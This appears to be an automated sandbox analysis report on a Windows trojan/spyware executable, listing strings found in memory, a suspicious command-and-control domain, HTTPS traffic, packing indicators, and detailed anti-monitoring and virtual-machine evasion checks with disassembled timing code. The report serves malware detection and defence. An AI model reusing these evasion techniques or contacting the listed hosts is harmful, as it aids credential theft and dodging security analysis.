                Source: fer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510562445.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510838458.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1512013029.0000000005FED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/ku
                Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pi
                Source: fer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/pil
                Source: fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/~Z
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: fer4JIJGeL.exe, 00000000.00000003.1511958293.000000000606A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: fer4JIJGeL.exeStatic PE information: section name:
                Source: fer4JIJGeL.exeStatic PE information: section name: .idata
                Source: fer4JIJGeL.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018711E40_3_018711E4
                Source: fer4JIJGeL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: fer4JIJGeL.exeStatic PE information: Section: ZLIB complexity 0.9995915032679739
                Source: fer4JIJGeL.exeStatic PE information: Section: uezamyof ZLIB complexity 0.9945773596744752
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: fer4JIJGeL.exe, 00000000.00000003.1465857694.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1466341726.0000000005F6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: fer4JIJGeL.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile read: C:\Users\user\Desktop\fer4JIJGeL.exeJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: fer4JIJGeL.exeStatic file information: File size 1854976 > 1048576
                Source: fer4JIJGeL.exeStatic PE information: Raw size of uezamyof is bigger than: 0x100000 < 0x19ae00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeUnpacked PE file: 0.2.fer4JIJGeL.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uezamyof:EW;cvgltxxf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uezamyof:EW;cvgltxxf:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: fer4JIJGeL.exeStatic PE information: real checksum: 0x1cdcde should be: 0x1c9e74
                Source: fer4JIJGeL.exeStatic PE information: section name:
                Source: fer4JIJGeL.exeStatic PE information: section name: .idata
                Source: fer4JIJGeL.exeStatic PE information: section name:
                Source: fer4JIJGeL.exeStatic PE information: section name: uezamyof
                Source: fer4JIJGeL.exeStatic PE information: section name: cvgltxxf
                Source: fer4JIJGeL.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_018734EF push esi; retf 0_3_018734F2
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeCode function: 0_3_01875064 push esi; retf 0_3_01875067
                Source: fer4JIJGeL.exeStatic PE information: section name: entropy: 7.984706196214209
                Source: fer4JIJGeL.exeStatic PE information: section name: uezamyof entropy: 7.953990333526645

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E09774 second address: E0978E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E098E2 second address: E098E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E098E8 second address: E098F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E098F0 second address: E098F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E09BA5 second address: E09BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9F112ED796h 0x00000009 jmp 00007F9F112ED7A8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9F112ED7A5h 0x0000001b jmp 00007F9F112ED7A5h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D644 second address: E0D691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c jmp 00007F9F10525C06h 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9F10525C06h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D691 second address: E0D69C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F9F112ED796h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D69C second address: E0D6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jbe 00007F9F10525BFEh 0x0000000f push esi 0x00000010 jl 00007F9F10525BF6h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D6BC second address: E0D701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9F112ED798h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop eax 0x00000010 mov edi, dword ptr [ebp+122D39AFh] 0x00000016 push 00000003h 0x00000018 xor ecx, dword ptr [ebp+122D395Fh] 0x0000001e push 00000000h 0x00000020 mov edx, dword ptr [ebp+122D383Fh] 0x00000026 push 00000003h 0x00000028 mov edx, dword ptr [ebp+122D3807h] 0x0000002e push 651E852Dh 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F9F112ED79Fh 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D701 second address: E0D705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D705 second address: E0D72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 5AE17AD3h 0x0000000e adc dx, 4756h 0x00000013 lea ebx, dword ptr [ebp+124584D3h] 0x00000019 mov dword ptr [ebp+122D25D5h], ebx 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D72C second address: E0D731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D731 second address: E0D73B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F112ED79Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D73B second address: E0D759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F9F10525C01h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D7E9 second address: E0D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D7EE second address: E0D840 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9F10525BFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F9F10525C04h 0x00000011 nop 0x00000012 mov ecx, ebx 0x00000014 push 00000000h 0x00000016 mov edi, 2864FADEh 0x0000001b mov esi, dword ptr [ebp+122D39CFh] 0x00000021 push BE43E731h 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 jmp 00007F9F10525C04h 0x0000002e pop esi 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D840 second address: E0D845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D845 second address: E0D8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 41BC194Fh 0x00000010 jmp 00007F9F10525BFBh 0x00000015 push 00000003h 0x00000017 mov di, 9CAFh 0x0000001b push 00000000h 0x0000001d mov edx, edi 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F9F10525BF8h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000018h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b push 496DA1C1h 0x00000040 push ecx 0x00000041 jmp 00007F9F10525BFDh 0x00000046 pop ecx 0x00000047 add dword ptr [esp], 76925E3Fh 0x0000004e mov dword ptr [ebp+122D25CDh], ebx 0x00000054 lea ebx, dword ptr [ebp+124584DCh] 0x0000005a add dword ptr [ebp+122D24BAh], esi 0x00000060 xchg eax, ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 je 00007F9F10525BFCh 0x00000069 jnl 00007F9F10525BF6h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D937 second address: E0D9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jbe 00007F9F112ED7B2h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F9F112ED798h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 jns 00007F9F112ED79Ch 0x0000002e add di, 6371h 0x00000033 sbb ecx, 557A33FBh 0x00000039 push 00000000h 0x0000003b stc 0x0000003c call 00007F9F112ED799h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 pop edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D9A6 second address: E0D9AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D9AA second address: E0D9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D9B5 second address: E0D9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E0D9C0 second address: E0DA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop ebx 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F9F112ED79Ch 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007F9F112ED7A0h 0x00000020 pop eax 0x00000021 movsx edi, di 0x00000024 push 00000003h 0x00000026 add dl, FFFFFFA0h 0x00000029 push 00000000h 0x0000002b xor dword ptr [ebp+122D3261h], esi 0x00000031 push 00000003h 0x00000033 or cl, 0000007Eh 0x00000036 push 983C7B60h 0x0000003b jno 00007F9F112ED7A0h 0x00000041 add dword ptr [esp], 27C384A0h 0x00000048 mov dword ptr [ebp+122D21AFh], ecx 0x0000004e lea ebx, dword ptr [ebp+124584E7h] 0x00000054 mov dx, ax 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a jmp 00007F9F112ED7A3h 0x0000005f pop eax 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
